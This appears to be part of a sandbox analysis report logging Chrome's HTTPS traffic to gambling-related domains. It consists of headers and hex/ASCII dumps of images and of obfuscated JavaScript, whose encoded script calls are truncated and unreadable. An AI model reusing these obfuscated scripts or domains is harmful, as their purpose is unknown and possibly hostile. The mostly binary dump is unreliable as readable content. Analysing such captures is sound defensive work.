                                                                                                                                                          2024-06-09 22:41:24 UTC636INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 760
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:50 GMT
                                                                                                                                                          ETag: "6645caca-2f8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,1],EU-GER-frankfurt-GLOBAL1-CACHE1[15],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,14],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826085
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 79a4e63eaaa2c8d79414c3f61721084a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765915
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC760INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 47 59 42 64 41 47 67 47 38 41 69 41 52 67 44 63 41 4e 41 4e 6b 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 36 6b 51 70 4a 41 45 6f 71 48 4a 43 41 41 45 53 48 67 43 63 2b 76 53 67 47 34 41 38 6d 41 42 57 49 58 67 44 6f 41 4a 69 44 5a 38 30 49 41 41 71 4b 55 45 45 49 70 34 42 50 54 4b 4d 6f 42 39 56 79 43 51 42 5a 46 49 59 34 41 62 45 45 6f 4b 57 69 68 2f 44 68 41 57 41 45 49 41 42 67 42 66 63 54 55 41 5a 53 55 7a 41 48 4e 53 41 43 45 55 46 45 43 6f 4e 44 56 51 78 56 6b 30 41 46 35 79 4e 43 67 41 57 30 6a 4b 46 58 51 41 57 69 52 61 4e 4f 43 49 61 77 67 6b 46 6e 4a 36 74 41 42 68 66 79 67 6b 4c 76 4a 48 57 78 59 55 35 54 51 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          714192.168.2.55049690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC599OUTGET /pc/image-pc/lang_pz/264.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 205204
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 21 Aug 2018 10:28:33 GMT
                                                                                                                                                          ETag: "5b7be951-32194"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[5],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE6[5],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467534
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: dfd07da7ea86c9a1bd1ebaba47f15ddd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124466
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 cb 00 00 00 f2 08 06 00 00 00 bb e2 88 97 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 70 2f 12 11 b0 01 82 3a 03 19 1a e2 77 60 00 5e 47 2b 8d 21 a3 ef 31 50 93 41 f1 b8 5a 59 b3 2d 12 1b e8 1c 13 7e c7 6f 3e b4 b1 32 aa 2b 32 69 ba 61 44 e8 ef 00 9d 8f 50 ec a7 da a7 10 1b 26 ed a0 1a e2 8b f5 f4 5a 84 9d 37 01 85 1b 85 66 00 cd 35 75 c4 6f 6a 56 c4 ef 83 27 db 31 63 e7 bb 98 b9 fc 12 fc 59 60 b0 48 30 ab 58 8d f8 54 0d dc 43 6d a4 2d 11 a8 95 02 98 53 67 11 ef e2 c9 18 f7 51 b8 af 87 d6 90 01 31 71 5c a9 4b 61 c7 dd 4f 63 18 70 0f 43 ae 26 d3 47 63 cd 70 5c 28 94 53 18 33 90 c6 85 a0 a2 e0 22 10 91 0e 93 76 7a ec f5 08 b9 86 11 a4 9a 10 0a 32 89 4f 52 28 8d 39 d0 89 29 44 92 86 07 dc fd 74 5c 66 b1 83 f9 9e 06 35 65 69 22 99 5b 13 1d e7 bc 86 33 1c a7 e6 e8 19 ac 27 83 eb a2 b9 25 3d e2 e9 c8 a4 78 c9 c0 e7 81 2f d5 91 86 bb 59 a3 a9 d6
                                                                                                                                                          Data Ascii: p/:w`^G+!1PAZY-~o>2+2iaDP&Z7f5uojV'1cY`H0XTCm-SgQ1q\KaOcpC&Gcp\(S3"vz2OR(9)Dt\f5ei"[3'%=x/Y
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: c5 c2 41 31 3f 8f a4 74 69 64 5d 2b 15 9a 42 e5 fc ca fe 79 ee 79 e6 7f 43 2a ba 06 81 49 3a 87 c2 78 95 d7 23 fb 32 6f 8c 23 f1 3e 18 bc c3 31 ff 2c af 8f 13 ea f8 0a 9f 29 f7 c0 d2 64 99 87 58 69 38 92 53 fb 66 28 eb 15 ef ce 0c 85 61 4b 1b 13 bf 77 86 56 a4 b4 3a f6 9c 0a ba 73 2a be 52 22 55 25 04 b6 ed 76 87 4e 4f 59 ac 6b 94 26 45 82 de 98 0e 45 6f 2e 27 1b c8 88 17 61 36 0a 48 c7 26 71 ff cf 5e c6 6d 9f ff 38 c2 47 fe 88 bd 1b 4f 7f ed c9 1b 02 cb df be f7 40 b7 9c d8 86 db 3e 7a 03 76 12 92 cf a4 65 1a 30 81 e5 58 98 84 31 aa e4 fc 1a 7d 30 99 9c dc ba e5 93 59 a3 4e 83 46 1d 54 9c c0 ad bc 30 d6 9a 33 12 cb e0 91 0d 23 f8 8f 27 0f e3 95 e1 2e 9c 30 ec c7 ab 13 07 70 78 ec 28 d2 c9 5d 30 e4 46 e8 71 9b 48 d7 b1 74 74 fa cd 62 46 3a 95 e4 2f dd cc
                                                                                                                                                          Data Ascii: A1?tid]+ByyC*I:x#2o#>1,)dXi8Sf(aKwV:s*R"U%vNOYk&EEo.'a6H&q^m8GO@>zve0X1}0YNFT03#'.0px(]0FqHttbF:/
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: ed 23 78 d6 0c ad c9 01 8d c1 c8 78 3a f4 22 a9 2f 00 05 d0 31 f2 99 37 06 fb 90 b0 97 a2 62 da 0a 34 86 23 e8 33 a4 61 7a f5 02 a4 1b 75 4c 28 2d 96 60 75 26 06 54 18 18 8d 09 8c f3 c2 34 0e e3 09 76 6d 58 bc 13 a7 27 4c 7c 0f 35 71 10 d8 7b a3 a2 0c 4c 34 26 bd 57 10 23 cd 84 38 c9 50 73 06 d6 36 48 5f 4b c4 c5 a8 8b 5e 14 8a 3a 05 49 3f 59 8a 04 d9 73 8c ba 20 c5 52 6c bf 24 99 39 29 4b ce 82 00 69 00 d2 f7 51 31 7b 5a b6 66 af 49 92 73 b4 dc 49 cf 43 9c 2d 52 5a d6 a6 41 35 aa f9 84 54 a2 21 ff d6 92 37 51 ee 12 ed a4 d5 b0 66 3f 26 54 00 3d e5 22 93 d1 63 24 e7 86 96 62 0c 3a 51 d9 c2 6c 16 b5 aa 79 2d 79 9d 4f 16 89 04 c9 2b 9e e3 3f 3c d7 47 39 5b 06 83 0b 69 59 53 11 1c 6e 27 c0 de 4a ee c3 61 e8 4d 5a 0c 34 34 c3 33 1c c5 9e c3 7d 28 29 02 ea f6
                                                                                                                                                          Data Ascii: #xx:"/17b4#3azuL(-`u&T4vmX'L|5q{L4&W#8Ps6H_K^:I?Ys Rl$9)KiQ1{ZfIsIC-RZA5T!7Qf?&T="c$b:Qly-yO+?<G9[iYSn'JaMZ443}()
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 32 bc f3 ee 3b 9f 9a e4 db 50 42 48 ec dd d1 8c 03 fb 8e c3 4c 83 1b 9b e8 cf f4 5b 90 88 47 e1 70 7b 71 fa c4 cb 7c 70 4c cb 9b 06 e8 92 b6 ba 3c c0 87 96 f6 b1 c8 ed 87 bd 67 4b a5 9a 4a 30 6f ee fc bf f9 ee c3 d6 fb 7b bf b3 25 9f 80 eb 99 fb 62 df 69 df 6b cb 99 bf ff 57 fb fc af ce 53 5b d2 09 d0 ff bd 7d 38 fe 8b e3 6b db 7d d8 6f 67 be 6a fb 2e 2b 2b e6 45 94 26 ce 0a 25 a9 45 d9 49 e8 3c a2 50 e5 94 99 54 ad 68 87 45 e8 83 db 5f 85 b0 33 1d 23 9d db 20 98 a3 18 20 e0 5f 5c 9e 83 9e c6 1d c8 f0 e4 61 e6 bc 6a 3c fb e4 21 fb e9 cd ed 63 b6 5f df f6 9b a7 b9 7c 5b 63 33 8d fd 2f 6d 40 38 10 41 46 3a 39 6a 1e a6 bc 6b 55 45 45 04 9e b2 c8 40 a3 51 60 44 eb dd 3c b8 a4 e6 33 2b 18 5a 49 85 d4 ed 9e 2e 01 2d 40 63 a7 57 e8 cd 18 e8 76 70 5e 61 16 34 73
                                                                                                                                                          Data Ascii: 2;PBHL[Gp{q|pL<gKJ0o{%bikWS[}8k}ogj.++E&%EI<PThE_3# _\aj<!c_|[c3/m@8AF:9jkUEE@Q`D<3+ZI.-@cWvp^a4s
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 56 8e ab 37 6d 77 ed 71 db 9d 3f fe d4 59 f5 35 8d f9 98 88 d9 d1 bd 69 3d 1a 1a 9c 08 d0 45 16 d4 54 a0 a6 69 25 7c 25 17 63 6a f8 24 92 e1 29 b8 f2 6b 08 e0 66 ab e5 78 08 52 ba a6 fd 0b 29 6d c8 ea 34 db e9 94 12 7c 65 39 63 8d a8 53 10 52 62 f9 77 6a 72 82 1e 82 20 c2 71 b6 7f b4 62 7c 7c 08 2e 07 1b 37 e4 52 c6 65 c6 78 20 82 13 87 8e 61 f1 b2 05 a2 22 98 9d e5 47 4f 4f 37 82 31 ca cc 22 93 42 bd 22 b7 c8 8f c9 d1 09 d1 18 11 09 4d 22 2f af 14 05 25 65 18 1b 38 85 dc c2 62 71 3a 8b c5 aa 0e 56 09 61 ca cc 1d 2e bb c8 03 13 84 97 86 87 06 e0 cf f2 c1 45 41 3b 12 0d 0b 0e b4 db e3 17 e5 80 23 87 8f a0 b0 24 1f 59 f4 5e 3c 19 a3 ac d6 a7 0c 74 fa 41 99 85 1f a7 6b 0a 4e 4d c0 e1 a1 80 9f 9d 2d e8 d6 31 fa 2e 2c e3 66 a6 eb 09 0b cd 4c af 7a 3f e8 51 4e
                                                                                                                                                          Data Ascii: V7mwq?Y5i=ETi%|%cj$)kfxR)m4|e9cSRbwjr qb||.7Rex a"GOO71"B"M"/%e8bq:Va.EA;#$Y^<tAkNM-1.,fLz?QN
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: d8 bc b5 17 50 44 89 22 1a 18 cd 8c 79 55 df fd 55 31 7c 5a 40 fe d7 d8 b8 81 90 39 c0 59 94 04 b2 86 32 9b 85 7c e9 cb 5f c6 8a e5 cb 05 a7 59 db 98 af cc fc 63 6d e3 cf dc 74 d3 4d ff 2a a5 e5 d3 62 b8 b2 8c 0d 4d 8f 5f af fe 99 09 78 b8 10 11 ab 8b 94 70 db f3 28 31 4e 41 4e f6 52 4c 8f d0 18 8f 60 64 f3 d3 58 72 f6 12 84 ec 45 58 71 e5 39 d8 ff cc e6 33 76 5c 6f 3e 30 3c f4 7f 66 17 f9 d7 3f b9 05 5d 6d 01 9c 7f e3 e7 f0 e8 7d df 85 db e7 14 14 32 93 a1 ef 49 b3 0b 67 d0 28 1a 9a 05 47 57 56 34 88 79 ac 9b d4 8a aa 69 5a 95 4e a8 59 e8 14 03 29 53 e9 e5 95 5a 85 7a 96 52 db f0 a5 69 4d d0 0a 9d c1 f8 bc a4 14 65 0c 91 86 5a f4 ea 2d f4 fe 0d 93 8e 23 24 4d fe 15 ea 0a b2 56 81 55 f1 93 99 13 5b 49 23 55 a8 92 6d 92 c9 50 a1 35 4a db 29 d7 6f 52 e5 09
                                                                                                                                                          Data Ascii: PD"yUU1|Z@9Y2|_YcmtM*bM_xp(1NANRL`dXrEXq93v\o>0<f?]m}2Ig(GWV4yiZNY)SZzRiMeZ-#$MVU[I#UmP5J)oR
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: ba 7a 8e b9 21 e3 47 32 7e aa 0f 11 f6 d2 d1 28 26 78 8b e9 bd 48 8a a9 85 83 00 f4 99 7d 27 51 94 fc 20 bd 3f f9 f0 f8 cb 10 a1 d5 b6 1f 1f 1f bb 54 ef db fd ff d1 77 e6 da c5 85 ad cf 6c 39 84 9e 9e 51 04 f4 18 d6 d4 95 21 19 9e 45 86 00 9f 50 32 35 23 79 67 28 2b 18 19 5c 58 aa 5d 0c 1a 54 a3 b4 2e 18 2c 27 20 19 40 45 59 0d 0e 1d db 83 2d 5b 7f 87 b2 9a 32 02 66 53 58 bb fc 72 9c 6c 6f 47 43 dd 0a 5a a7 1c 5b 77 fd 16 3e 2f eb 25 8f c2 e7 76 d2 73 f0 18 06 66 0e 27 76 ed db 82 9a 9a 66 4c ce 4c 61 60 a0 4b 0a b3 15 35 83 65 ad 97 49 06 bb bb f7 0c f6 1f da 8d 1b 5e 76 0b 85 25 0d dd 83 9d 98 3a 92 a6 b8 37 41 a0 72 8a 62 a9 9b 80 f4 38 81 d9 71 8a b9 75 d2 bb 4f 4e 4c c0 45 71 ac fb cc 19 8a cd 14 4f 03 27 31 30 d8 8f c2 a2 42 f9 3b e8 0f a1 ab a7 8b
                                                                                                                                                          Data Ascii: z!G2~(&xH}'Q ?Twl9Q!EP25#yg(+\X]T.,' @EY-[2fSXrloGCZ[w>/%vsf'vfLLa`K5eI^v%:7Arb8quONLEqO'10B;
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 28 0f d6 61 68 a8 1f ad ad f3 05 9c 1e 3f b1 8f 62 fe 1c 9c 38 73 14 5c ab 60 b3 91 33 67 ce 50 8c 65 5d 63 4d 7a 48 b4 6c 5a 7a 56 98 a2 16 99 9a 42 5d 4d 05 9a 1a e6 d1 75 cb 4a 35 d7 45 6f 64 53 95 68 2c 8a d8 cc 34 86 47 86 b0 72 f9 7a a1 b7 25 12 51 da 8f 53 e6 90 64 32 86 b3 1d 67 a5 a1 f1 92 0d 57 21 a3 25 04 67 a4 08 b8 4f 4d 8f 23 11 4f a2 b0 b0 54 8f c3 19 05 fd 43 9d b2 52 5f 57 dd 22 55 6d 5d 33 5a 07 b9 ac b9 cc 0d a3 43 a3 bd f4 bd 46 b1 68 c1 32 e1 17 73 91 7b 62 22 8c 5e fa fe 15 15 75 a2 0d ae 1a d4 12 87 dd a6 53 3a e9 fd 3d fd 3d a8 a9 ae 15 50 ad 11 b6 08 85 06 29 ee 7b 31 1e 1e 13 fc 55 54 58 02 97 db 06 8f 9b 4d 71 74 f0 ae 5b 6f eb 55 79 9d 6a 64 33 94 c4 74 cc a5 63 26 bb c4 ec 48 64 4a 7a 7e 18 93 45 86 47 11 9f 48 61 e7 d1 29 dc
                                                                                                                                                          Data Ascii: (ah?b8s\`3gPe]cMzHlZzVB]MuJ5EodSh,4Grz%QSd2gW!%gOM#OTCR_W"Um]3ZCFh2s{b"^uS:==P){1UTXMqt[oUyjd3tc&HdJz~EGHa)
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: ad 22 67 da d2 33 35 21 c9 b9 69 a2 44 a2 66 a2 21 99 17 57 2d 5c 68 3a ac d0 35 86 65 ad 34 ab d1 a4 25 c9 68 b0 63 db 11 6c 5b 97 ee 9b 33 bb 15 03 7d 43 5c f8 3b e0 f5 71 2d 44 7e a5 e8 7f 0c 2c ef de bb 17 95 4d b3 50 53 59 86 27 9e 78 0e 73 17 2d 45 d1 29 85 ac f6 a2 2a 14 08 9c a2 a0 53 4c 54 3d e7 5c 36 ad 7f 5f 41 6f c4 d0 2e b4 3a 82 f4 2d 4d 19 66 ce b6 62 da a2 40 5f 75 d4 e8 15 68 5e 45 d0 5d b3 8c 7d 4f 25 f9 12 b5 1e 10 e8 c6 2b aa bc 9c 59 57 52 e6 de ec d0 b7 49 20 da 09 5f 4c 61 bc fd 0d 14 d6 9c 89 5c 9c b2 57 3b e5 e2 ae 00 0a aa 45 b4 ef 3d 88 5d bb a2 f0 55 2f c3 ff be f5 bb e8 dd fe d8 8c 07 11 25 5e ca c4 c7 76 c3 e7 96 30 eb f8 f9 d8 d1 d9 89 8a 85 39 ee 57 2f 88 96 bf 19 24 6b 00 83 2d d6 6c d1 65 2a 19 ba 0c a0 3a 5a 98 95 33 fb
                                                                                                                                                          Data Ascii: "g35!iDf!W-\h:5e4%hcl[3}C\;q-D~,MPSY'xs-E)*SLT=\6_Ao.:-Mfb@_uh^E]}O%+YWRI _La\W;E=]U/%^v09W/$k-le*:Z3


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          715192.168.2.55049454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC555OUTGET /pc/240516-03/static/js/components/wrapper.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC338INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          Etag: "6645cad4-744"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1860
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 2727248031981813024
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC1860INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 45 34 42 64 41 47 67 47 38 41 52 53 67 4a 51 45 55 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 56 4a 43 6b 4f 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 56 35 4b 43 43 48 6b 63 41 6e 70 6b 46 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 44 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 32 45 56 45 50 6c 70 4c 67 42 65 44 6b 77 78 53 6e 30 41 44 6d 41 78 59 56 4a 35 64 4e 30 30 54 43 35 43 6c 6e 54 4d 36 4a 67 49 4a 67 4c 53 58 32 71 78 41 44 6b 41 54 51 41 50 4e 55 61 55 56 4d 78 35 54 47 46 4d 63 6c 6a 53 44 57 31 4f 54 46 39
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          716192.168.2.55050090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC384OUTGET /pc/image-pc/index/312/nav/casino/slot_bg.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 41871
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Mon, 10 Feb 2020 11:21:24 GMT
                                                                                                                                                          ETag: "5e413cb4-a38f"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 118e816484bdbd01b5ba2fed49d1a95a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15769INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 91 3e fa 68 1b ab c5 f5 cc 9d bf 60 5f 45 45 65 7b 47 57 a7 83 80 eb 6a 69 6a 44 29 89 ea de ae 4e 62 af 10 2c 52 0c d3 27 e5 22 ab b0 18 0f 3f f4 10 7e f7 97 c7 90 65 35 62 c9 fc 39 e0 58 b5 13 9d ab 96 36 36 bd 35 41 e1 9b 5d 5b 9c 18 20 16 8d a8 8c c2 c0 c2 08 39 42 3a a6 b9 a5 0d 4e bb 05 4b 8f 98 87 64 94 e9 19 59 95 91 7e 72 7f 6c c6 41 d6 f1 17 60 34 bb 02 cf de 77 0f fe fa c8 23 c8 29 c8 c7 05 17 5d 08 07 09 62 c6 3c b6 ac 3c 74 90 dd ef d8 f1 11 86 da db 61 b4 9a 50 59 3d 43 ed 20 fd 9d 1d e5 fe 40 60 c8 41 4c f9 0f a6 8e 7c c0 6e e5 63 8f 3d 87 e6 fd 1d a1 b6 7d 3d be be 9d b5 49 68 25 ac ba e0 4c 53 6e 7e 0e d7 dd dc 2a a5 ec bf 34 51 22 a0 2e ad c2 51 d8 ec 1a 55 b2 66 cc 99 6a aa ac e9 10 59 bd 82 20 ea 33 b8 84 c7 9b 5a 93 3e 95 fe 4d 2a a9
                                                                                                                                                          Data Ascii: >h`_EEe{GWjijD)Nb,R'"?~e5b9X665A][ 9B:NKdY~rlA`4w#)]b<<taPY=C @`AL|nc=}=Ih%LSn~*4Q".QUfjY 3Z>M*
